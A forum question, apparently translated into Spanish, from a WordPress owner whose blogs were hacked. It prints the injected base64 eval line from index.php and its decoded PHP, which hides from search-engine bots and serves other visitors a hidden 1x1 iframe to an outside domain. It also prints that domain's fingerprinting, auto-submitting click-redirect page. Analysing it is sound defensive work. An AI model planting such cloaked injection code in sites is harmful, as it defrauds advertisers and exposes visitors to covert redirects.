10
Mantengo tres blogs de wordpress, y ayer por la mañana, todos fueron pirateados. Dentro de toda mi index.php la primera línea parecía como sigue:wordpress hackeado: ¿qué hace realmente este script?
<?php eval(base64_decode('ZXJyb3JfcmVwb3J0aW5nKDApOw0KJGJvdCA9IEZBTFNFIDsNCiR1c2VyX2FnZW50X3RvX2ZpbHRlciA9IGFycmF5KCdib3QnLCdzcGlkZXInLCdzcHlkZXInLCdjcmF3bCcsJ3ZhbGlkYXRvcicsJ3NsdXJwJywnZG9jb21vJywneWFuZGV4JywnbWFpbC5ydScsJ2FsZXhhLmNvbScsJ3Bvc3RyYW5rLmNvbScsJ2h0bWxkb2MnLCd3ZWJjb2xsYWdlJywnYmxvZ3B1bHNlLmNvbScsJ2Fub255bW91c2Uub3JnJywnMTIzNDUnLCdodHRwY2xpZW50JywnYnV6enRyYWNrZXIuY29tJywnc25vb3B5JywnZmVlZHRvb2xzJywnYXJpYW5uYS5saWJlcm8uaXQnLCdpbnRlcm5ldHNlZXIuY29tJywnb3BlbmFjb29uLmRlJywncnJycnJycnJyJywnbWFnZW50JywnZG93bmxvYWQgbWFzdGVyJywnZHJ1cGFsLm9yZycsJ3ZsYyBtZWRpYSBwbGF5ZXInLCd2dnJraW1zanV3bHkgbDN1Zm1qcngnLCdzem4taW1hZ2UtcmVzaXplcicsJ2JkYnJhbmRwcm90ZWN0LmNvbScsJ3dvcmRwcmVzcycsJ3Jzc3JlYWRlcicsJ215YmxvZ2xvZyBhcGknKTsNCiRzdG9wX2lwc19tYXNrcyA9IGFycmF5KA0KCWFycmF5KCIyMTYuMjM5LjMyLjAiLCIyMTYuMjM5LjYzLjI1NSIpLA0KCWFycmF5KCI2NC42OC44MC4wIiAgLCI2NC42OC44Ny4yNTUiICApLA0KCWFycmF5KCI2Ni4xMDIuMC4wIiwgICI2Ni4xMDIuMTUuMjU1IiksDQoJYXJyYXkoIjY0LjIzMy4xNjAuMCIsIjY0LjIzMy4xOTEuMjU1IiksDQoJYXJyYXkoIjY2LjI0OS42NC4wIiwgIjY2LjI0OS45NS4yNTUiKSwNCglhcnJheSgiNzIuMTQuMTkyLjAiLCAiNzIuMTQuMjU1LjI1NSIpLA0KCWFycmF5KCIyMDkuODUuMTI4LjAiLCIyMDkuODUuMjU1LjI1NSIpLA0KCWFycmF5KCIxOTguMTA4LjEwMC4xOTIiLCIxOTguMTA4LjEwMC4yMDciKSwNCglhcnJheSgiMTczLjE5NC4wLjAiLCIxNzMuMTk0LjI1NS4yNTUiKSwNCglhcnJheSgiMjE2LjMzLjIyOS4xNDQiLCIyMTYuMzMuMjI5LjE1MSIpLA0KCWFycmF5KCIyMTYuMzMuMjI5LjE2MCIsIjIxNi4zMy4yMjkuMTY3IiksDQoJYXJyYXkoIjIwOS4xODUuMTA4LjEyOCIsIjIwOS4xODUuMTA4LjI1NSIpLA0KCWFycmF5KCIyMTYuMTA5Ljc1LjgwIiwiMjE2LjEwOS43NS45NSIpLA0KCWFycmF5KCI2NC42OC44OC4wIiwiNjQuNjguOTUuMjU1IiksDQoJYXJyYXkoIjY0LjY4LjY0LjY0IiwiNjQuNjguNjQuMTI3IiksDQoJYXJyYXkoIjY0LjQxLjIyMS4xOTIiLCI2NC40MS4yMjEuMjA3IiksDQoJYXJyYXkoIjc0LjEyNS4wLjAiLCI3NC4xMjUuMjU1LjI1NSIpLA0KCWFycmF5KCI2NS41Mi4wLjAiLCI2NS41NS4yNTUuMjU1IiksDQoJYXJyYXkoIjc0LjYuMC4wIiwiNzQuNi4yNTUuMjU1IiksDQoJYXJyYXkoIjY3LjE5NS4wLjAiLCI2Ny4xOTUuMjU1LjI1NSIpLA0KCWFycmF5KCI3Mi4zMC4wLjAiLCI3Mi4zMC4yNTUuMjU1IiksDQoJYXJyYXkoIjM4LjAuMC4wIiwiMzguMjU1LjI1NS4yNTUiKQ0KCSk7DQokbXlfaXAybG9uZyA9IHNwcmludGYoIiV1IixpcDJsb25nKCRfU0VSVkVSWydSRU1PVEVfQUREUiddKSk7DQpmb3JlYWNoICggJHN0b3BfaXBzX21hc2tzIGFzICRJUHMgKSB7DQoJJGZpcnN0X2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1swXSkpOyAkc2Vjb25kX2Q9c3ByaW50ZigiJXUiLGlwMmxvbmcoJElQc1sxXSkpOw0KCWlmICgkbXlfaXAybG9uZyA+PSAkZmlyc3RfZCAmJiAkbXlfaXAybG9uZyA8PSAkc2Vjb25kX2QpIHskYm90ID0gVFJVRTsgYnJlYWs7fQ0KfQ0KZm9yZWFjaCAoJHVzZXJfYWdlbnRfdG9fZmlsdGVyIGFzICRib3Rfc2lnbil7DQoJaWYgIChzdHJwb3MoJF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddLCAkYm90X3NpZ24pICE9PSBmYWxzZSl7JGJvdCA9IHRydWU7IGJyZWFrO30NCn0NCmlmICghJGJvdCkgew0KZWNobyAnPGlmcmFtZSBzcmM9Imh0dHA6Ly93dW1wZWFycG15LmN6LmNjL2dvLzEiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaWZyYW1lPic7DQp9'))
Aparte de fijación (que parece haber funcionado), me pregunto lo que hace, y para qué propósito.
Así que descodifica el código introducido:
error_reporting(0);
$bot = FALSE ;
$user_agent_to_filter = array('bot','spider','spyder','crawl','validator','slurp','docomo','yandex','mail.ru','alexa.com','postrank.com','htmldoc','webcollage','blogpulse.com','anonymouse.org','12345','httpclient','buzztracker.com','snoopy','feedtools','arianna.libero.it','internetseer.com','openacoon.de','rrrrrrrrr','magent','download master','drupal.org','vlc media player','vvrkimsjuwly l3ufmjrx','szn-image-resizer','bdbrandprotect.com','wordpress','rssreader','mybloglog api');
$stop_ips_masks = array(
array("216.239.32.0","216.239.63.255"),
array("64.68.80.0" ,"64.68.87.255" ),
array("66.102.0.0", "66.102.15.255"),
array("64.233.160.0","64.233.191.255"),
array("66.249.64.0", "66.249.95.255"),
array("72.14.192.0", "72.14.255.255"),
array("209.85.128.0","209.85.255.255"),
array("198.108.100.192","198.108.100.207"),
array("173.194.0.0","173.194.255.255"),
array("216.33.229.144","216.33.229.151"),
array("216.33.229.160","216.33.229.167"),
array("209.185.108.128","209.185.108.255"),
array("216.109.75.80","216.109.75.95"),
array("64.68.88.0","64.68.95.255"),
array("64.68.64.64","64.68.64.127"),
array("64.41.221.192","64.41.221.207"),
array("74.125.0.0","74.125.255.255"),
array("65.52.0.0","65.55.255.255"),
array("74.6.0.0","74.6.255.255"),
array("67.195.0.0","67.195.255.255"),
array("72.30.0.0","72.30.255.255"),
array("38.0.0.0","38.255.255.255")
);
$my_ip2long = sprintf("%u",ip2long($_SERVER['REMOTE_ADDR']));
foreach ($stop_ips_masks as $IPs) {
$first_d=sprintf("%u",ip2long($IPs[0])); $second_d=sprintf("%u",ip2long($IPs[1]));
if ($my_ip2long >= $first_d && $my_ip2long <= $second_d) {$bot = TRUE; break;}
}
foreach ($user_agent_to_filter as $bot_sign){
if (strpos($_SERVER['HTTP_USER_AGENT'], $bot_sign) !== false){$bot = true; break;}
}
if (!$bot) {
echo '<iframe src="http://wumpearpmy.cz.cc/go/1" width="1" height="1"></iframe>';
}
Aproximadamente, si he entendido bien, se mostrará un extra iframe con alguna fuente que tendrá que cargar, pero sólo si el agente de usuario e IP son no en la lista de ips bloqueados, o bots bloqueados. Adivino: para asegurarme de que mi sitio no se ponga en la lista negra, pero cualquier visitante recibirá spam.
Pero todavía tenía curiosidad: ¿qué es lo que realmente hace?
Así que siguieron el enlace a http://wumpearpmy.cz.cc/go/1 usando RESTClient y obtener el siguiente HTML devuelto:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<title>http://groupon.be</title>
<head>
<STYLE>
BODY {
BACKGROUND: #666; FONT: 100% Georgia, "Times New Roman", Times, serif; COLOR: #666
}
A {
COLOR: #fe701a
}
A:hover {
COLOR: #fdc336
}
P {
FONT: 105% century
}
.main_wrapper{
width:90%; margin:auto; border:10px solid #888888; background-color:#FFFFFF; margin-top:25px; height:450px;
}
.skipimage{margin:auto; text-align:center; height:30%}
.img_wrapper{background-image:url(continue.gif); background-position:top; background-repeat:no-repeat; width:435px; height:215px}
</style>
<script type="text/javascript">
function getCookie(name){var start=document.cookie.indexOf(name+"=");var len=start+name.length+1;if((!start)&&(name!=document.cookie.substring(0,name.length))){return null;}
if(start==-1)return null;var end=document.cookie.indexOf(';',len);if(end==-1)end=document.cookie.length;return unescape(document.cookie.substring(len,end));}function setCookie(name,value,expires,path,domain,secure){var today=new Date();today.setTime(today.getTime());
var expires_date=new Date(today.getTime()+(expires));document.cookie=name+'='+escape(value)+
((expires)?';expires='+expires_date.toGMTString():'')+
((path)?';path='+path:'')+
((domain)?';domain='+domain:'')+
((secure)?';secure':'');}
</script>
</head>
<body>
<form method="get" action="http://clicks.maximumspeedfind.com/xtr3_new?q=domain+names" name="rr">
<input type="hidden" name="sid" value="294787600" />
<input type="hidden" name="sa" value="13" />
<input type="hidden" name="p" value="1" />
<input type="hidden" name="s" value="98795" />
<input type="hidden" name="qt" value="1307865129" />
<input type="hidden" name="q" value="domain names" />
<input type="hidden" name="rf" value="" />
<input type="hidden" name="enc" value="" />
<input type="hidden" name="enk" value="RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm" />
<input type="hidden" name="xsc" value="" />
<input type="hidden" name="xsp" value="" />
<input type="hidden" name="xsm" value="" />
<input type="hidden" name="xuc" value=""/>
<input type="hidden" name="xcf" value=""/>
<input type="hidden" name="xai" value=""/>
<input type="hidden" name="qxcli" value="8904e76aaa70acee" />
<input type="hidden" name="qxsi" value="e0f63d5350e1c1d9" />
<input type="hidden" name="mk" value="1" />
<input type="hidden" name="ScreenX" value="0" />
<input type="hidden" name="ScreenY" value="0" />
<input type="hidden" name="BrowserX" value="0" />
<input type="hidden" name="BrowserY" value="0"/>
<input type="hidden" name="MouseX" value="0"/>
<input type="hidden" name="MouseY" value="0"/>
<input type="hidden" name="is_iframe" value="0"/>
</form>
<div class="main_wrapper">
<table width="60%" border="0" align="center" cellpadding="0" cellspacing="0" height="100%">
<tr>
<td align="center" valign="middle">
<table width="435" border="0" cellspacing="0" cellpadding="0">
<tr>
<td class="img_wrapper" >
<div style="width:60%; margin:auto;height:215px;">
<div class="skipimage" style="padding-top:40px;">
<!-- a href="javascript:void(0)" onclick="press();"><img src="skip.gif"/border="0"></a -->
<a href="http://clicks.maximumspeedfind.com/xtr3_new?q=domain+names&enk=RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm&rf=&qxcli=8904e76aaa70acee&qxsi=e0f63d5350e1c1d9"><img src="skip.gif"/border="0"></a>
</div>
<div class="skipimage">
<img src="ajax-loader.gif"/border="0">
<P><SPAN>Your request is loading...</SPAN></P>
</div>
</div>
</td>
</tr>
</table>
<br />
<p>If you are not redirected within 2 seconds <a href="http://clicks.maximumspeedfind.com/xtr3_new?q=domain+names&enk=RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm&rf=&qxcli=8904e76aaa70acee&qxsi=e0f63d5350e1c1d9">click here</a> to continue</p>
</td>
</tr>
</table>
</div>
<script type="text/javascript">
var hexcase=0;var b64pad="";var chrsz=8;function hex_md5(s){return binl2hex(core_md5(str2binl(s),s.length*chrsz));}
function core_md5(x,len){x[len>>5]|=0x80<<((len)%32);x[(((len+64)>>>9)<<4)+14]=len;var a=1732584193;var b=-271733879;var c=-1732584194;var d=271733878;for(var i=0;i<x.length;i+=16){var olda=a;var oldb=b;var oldc=c;var oldd=d;a=md5_ff(a,b,c,d,x[i+0],7,-680876936);d=md5_ff(d,a,b,c,x[i+1],12,-389564586);c=md5_ff(c,d,a,b,x[i+2],17,606105819);b=md5_ff(b,c,d,a,x[i+3],22,-1044525330);a=md5_ff(a,b,c,d,x[i+4],7,-176418897);d=md5_ff(d,a,b,c,x[i+5],12,1200080426);c=md5_ff(c,d,a,b,x[i+6],17,-1473231341);b=md5_ff(b,c,d,a,x[i+7],22,-45705983);a=md5_ff(a,b,c,d,x[i+8],7,1770035416);d=md5_ff(d,a,b,c,x[i+9],12,-1958414417);c=md5_ff(c,d,a,b,x[i+10],17,-42063);b=md5_ff(b,c,d,a,x[i+11],22,-1990404162);a=md5_ff(a,b,c,d,x[i+12],7,1804603682);d=md5_ff(d,a,b,c,x[i+13],12,-40341101);c=md5_ff(c,d,a,b,x[i+14],17,-1502002290);b=md5_ff(b,c,d,a,x[i+15],22,1236535329);a=md5_gg(a,b,c,d,x[i+1],5,-165796510);d=md5_gg(d,a,b,c,x[i+6],9,-1069501632);c=md5_gg(c,d,a,b,x[i+11],14,643717713);b=md5_gg(b,c,d,a,x[i+0],20,-373897302);a=md5_gg(a,b,c,d,x[i+5],5,-701558691);d=md5_gg(d,a,b,c,x[i+10],9,38016083);c=md5_gg(c,d,a,b,x[i+15],14,-660478335);b=md5_gg(b,c,d,a,x[i+4],20,-405537848);a=md5_gg(a,b,c,d,x[i+9],5,568446438);d=md5_gg(d,a,b,c,x[i+14],9,-1019803690);c=md5_gg(c,d,a,b,x[i+3],14,-187363961);b=md5_gg(b,c,d,a,x[i+8],20,1163531501);a=md5_gg(a,b,c,d,x[i+13],5,-1444681467);d=md5_gg(d,a,b,c,x[i+2],9,-51403784);c=md5_gg(c,d,a,b,x[i+7],14,1735328473);b=md5_gg(b,c,d,a,x[i+12],20,-1926607734);a=md5_hh(a,b,c,d,x[i+5],4,-378558);d=md5_hh(d,a,b,c,x[i+8],11,-2022574463);c=md5_hh(c,d,a,b,x[i+11],16,1839030562);b=md5_hh(b,c,d,a,x[i+14],23,-35309556);a=md5_hh(a,b,c,d,x[i+1],4,-1530992060);d=md5_hh(d,a,b,c,x[i+4],11,1272893353);c=md5_hh(c,d,a,b,x[i+7],16,-155497632);b=md5_hh(b,c,d,a,x[i+10],23,-1094730640);a=md5_hh(a,b,c,d,x[i+13],4,681279174);d=md5_hh(d,a,b,c,x[i+0],11,-358537222);c=md5_hh(c,d,a,b,x[i+3],16,-722521979);b=md5_hh(b,c,d,a,x[i+6],23,76029189);a=md5_hh(a,b,c,d,x[i+9],4,-640364487);d=md5_hh(d,a,b,c,x[i+12],11,-421815835);c=md5_hh(c,d,a,b,x[i+15],16,530742520);b=md5_hh(b,c,d,a,x[i+2],23,-995338651);a=md5_ii(a,b,c,d,x[i+0],6,-198630844);d=md5_ii(d,a,b,c,x[i+7],10,1126891415);c=md5_ii(c,d,a,b,x[i+14],15,-1416354905);b=md5_ii(b,c,d,a,x[i+5],21,-57434055);a=md5_ii(a,b,c,d,x[i+12],6,1700485571);d=md5_ii(d,a,b,c,x[i+3],10,-1894986606);c=md5_ii(c,d,a,b,x[i+10],15,-1051523);b=md5_ii(b,c,d,a,x[i+1],21,-2054922799);a=md5_ii(a,b,c,d,x[i+8],6,1873313359);d=md5_ii(d,a,b,c,x[i+15],10,-30611744);c=md5_ii(c,d,a,b,x[i+6],15,-1560198380);b=md5_ii(b,c,d,a,x[i+13],21,1309151649);a=md5_ii(a,b,c,d,x[i+4],6,-145523070);d=md5_ii(d,a,b,c,x[i+11],10,-1120210379);c=md5_ii(c,d,a,b,x[i+2],15,718787259);b=md5_ii(b,c,d,a,x[i+9],21,-343485551);a=safe_add(a,olda);b=safe_add(b,oldb);c=safe_add(c,oldc);d=safe_add(d,oldd);} return Array(a,b,c,d);}
function md5_cmn(q,a,b,x,s,t){return safe_add(bit_rol(safe_add(safe_add(a,q),safe_add(x,t)),s),b);}function md5_ff(a,b,c,d,x,s,t){return md5_cmn((b&c)|((~b)&d),a,b,x,s,t);}function md5_gg(a,b,c,d,x,s,t){return md5_cmn((b&d)|(c&(~d)),a,b,x,s,t);}function md5_hh(a,b,c,d,x,s,t){return md5_cmn(b^c^d,a,b,x,s,t);}function md5_ii(a,b,c,d,x,s,t){return md5_cmn(c^(b|(~d)),a,b,x,s,t);}function safe_add(x,y){var lsw=(x&0xFFFF)+(y&0xFFFF);var msw=(x>>16)+(y>>16)+(lsw>>16);return(msw<<16)|(lsw&0xFFFF);}function bit_rol(num,cnt){return(num<<cnt)|(num>>>(32-cnt));}function str2binl(str){var bin=Array();var mask=(1<<chrsz)-1;for(var i=0;i<str.length*chrsz;i+=chrsz) bin[i>>5]|=(str.charCodeAt(i/chrsz)&mask)<<(i%32);return bin;}function binl2hex(binarray){var hex_tab=hexcase?"ABCDEF":"abcdef";var str="";for(var i=0;i<binarray.length*4;i++) {str+=hex_tab.charAt((binarray[i>>2]>>((i%4)*8+4))&0xF)+ hex_tab.charAt((binarray[i>>2]>>((i%4)*8))&0xF);} return str;}
/* function getCookie(cookiename){ var cookiestring=""+document.cookie; var index1=cookiestring.indexOf(cookiename); if(index1==-1 || cookiename=="") return ""; var index2=cookiestring.indexOf(';',index1); if (index2==-1) index2=cookiestring.length; return unescape(cookiestring.substring(index1+cookiename.length+1,index2));} */
function add_ch(n,v){ if(v) { window.dch +="["+n+":"+enc_data(v)+"]";}}function enc_data(b){ if(typeof encodeURIComponent=="function") { return encodeURIComponent(b);} else {return escape(b);}}function G() {var dt = new Date(); if(!window.dch) { window.dch = "";} if(screen) { add_ch("h",screen.height); add_ch("w",screen.width); add_ch("cd",screen.colorDepth);} add_ch("tz", -dt.getTimezoneOffset()); add_ch("jv", navigator.javaEnabled()); if (navigator.plugins) { add_ch("pg",navigator.plugins.length); } if (navigator.mimeTypes) { add_ch("mm",navigator.mimeTypes.length); } add_ch('ua', navigator.userAgent); add_ch('ts', Date.parse(dt)); tr = hex_md5(dch); setCookie('xch', tr, 63072000000, '/', '', '');}function gsc(){if(!getCookie("xch")){G();}} gsc();
// global variable
var screenwidth;
var screenheight;
var viewportwidth;
var viewportheight;
var myMouseX, myMouseY;
var event_flag = false;
//window.onload = press;
function press(){
var dim = screenDimension();
document.forms['rr'].ScreenX.value = dim[0];
document.forms['rr'].ScreenY.value = dim[1];
// Browser X*Y
var dim_browser = browserDimension();
document.forms['rr'].BrowserX.value = dim_browser[0];
document.forms['rr'].BrowserY.value = dim_browser[1];
if((window.top!=window.self)){
document.forms['rr'].is_iframe.value = 1;
}
// document.onmousemove=getXYPosition; // start event listener
if (getCookie('mrc') != "groupon.be") {
setCookie('mrc', 'groupon.be', 180000, '/', '.maximumspeedfind.com', '');
document.forms['rr'].submit();
}else{
document.forms['rr'].action = 'http://clicks.maximumspeedfind.com/xtr2_new?q=domain+names&enk=RsmGuQe5xoEG4yaZj4mPyQe5J6mPiWaB5sHGqSaRJ+Mm&rf=&qxcli=8904e76aaa70acee&qxsi=e0f63d5350e1c1d9';
document.forms['rr'].submit();
}
}
/*
// mouse postion
function getXYPosition(e){
if(!event_flag){
// console.debug(e);
myMouseX = mouseXPos(e);
myMouseY = mouseYPos(e);
document.forms['rr'].MouseX.value = myMouseX;
document.forms['rr'].MouseY.value = myMouseY;
event_flag = true;
}
}
*/
// Screen
function screenDimension(){
if (typeof screen.width != 'undefined' && typeof screen.height != 'undefined')
{
screenwidth = screen.width;
screenheight = screen.height;
}
return [screenwidth,screenheight];
}
// Browser
function browserDimension(){
// the more standards compliant browsers (mozilla/netscape/opera/IE7) use window.innerWidth and window.innerHeight
if (typeof window.innerWidth != 'undefined')
{
viewportwidth = window.innerWidth,
viewportheight = window.innerHeight
}
// IE6 in standards compliant mode (i.e. with a valid doctype as the first line in the document)
else if (typeof document.documentElement != 'undefined' && typeof document.documentElement.clientWidth != 'undefined' && document.documentElement.clientWidth != 0)
{
viewportwidth = document.documentElement.clientWidth,
viewportheight = document.documentElement.clientHeight
}
// older versions of IE
else
{
viewportwidth = document.getElementsByTagName('body')[0].clientWidth,
viewportheight = document.getElementsByTagName('body')[0].clientHeight
}
var my = [viewportwidth,viewportheight];
return [viewportwidth,viewportheight];
//document.write('<p>Your viewport width is '+viewportwidth+'x'+viewportheight+'</p>');
}
/*
// Mouse postion
function mouseXPos(evt) {
if (evt.pageX)
return evt.pageX;
else if (evt.clientX)
return evt.clientX + (document.documentElement.scrollLeft ?document.documentElement.scrollLeft :document.body.scrollLeft);
else return null;
}
function mouseYPos(evt) {
if (evt.pageY) return evt.pageY;
else if (evt.clientY)
return evt.clientY + (document.documentElement.scrollTop ?document.documentElement.scrollTop :document.body.scrollTop);
else return null;
}
*/
press();
</script>
</body>
</html>
Ok. Puedo leer groupon.com, pero supongo que es simplemente falso (¿demasiado obvio?) Y comprobará la existencia de una cookie. ¿Qué galleta? No pude deducir eso inmediatamente. Y se publicará en dos segundos a clicks.maximumspeedfind.com. No intenté hacer eso. Mucho código para asegurarse de que la ventana permanezca pequeña, casi invisible. Pero parece que hay un montón de código ofuscado también.
¿Puede alguien aclararme qué están tratando de hacer aquí? ¿Y cómo?
¿Es esto alguien tasas de clics que están tratando de falsificar? (tal vez ingenuo).